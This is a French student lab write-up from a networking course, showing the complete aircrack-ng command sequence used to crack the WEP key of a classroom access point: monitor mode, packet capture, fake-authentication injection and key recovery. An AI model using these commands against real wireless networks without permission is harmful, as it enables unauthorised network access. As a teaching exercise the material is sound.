TP sysres IMA5sc 2019/2020 G3
Mise en place
Nous avons choisi comme nom de domaine herpesgenital
Cassage de clé WEP
On utilise pour casser la clé WEP un dongle wifi "Wi-Pi". Après avoir connecté le dongle on affiche la liste des interfaces wifi via la commande
$ iwconfig
On observe alors le nom de de l'interface associée au dongle : wlx40a5ef0590b2 renommée lors de la commande en wlan0mon
On commence par passer l'interface en mode moniteur :
$ airmon-ng start wlan0mon
On peut alors visualiser les point d'accès WEP disponibles :
$ airodump-ng --encrypt wep wlan0mon
On choisit de travailler avec cracotte04 dont on va essayer de casser la clé WEP. Grâce à la commande précédente on a pu récupérer son BSSID et son Channel. On capture les paquets sur l'interface de craquotte04 via la commande :
$ airodump-ng --channel 9 --bssid 04:DA:D2:9C:50:53 -w ./path_to_folder/cracotte04 wlan0mon
On lance alors en simultané sur un autre terminal des simulations de connexions au point d'accès
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:53 wlan0mon
Une fois avoir capturé un grand nombre de paquets (au moins 20 000), on peut alors lancer le cassage :
$ aircrack-ng ./path_to_folder/cracotte04.cap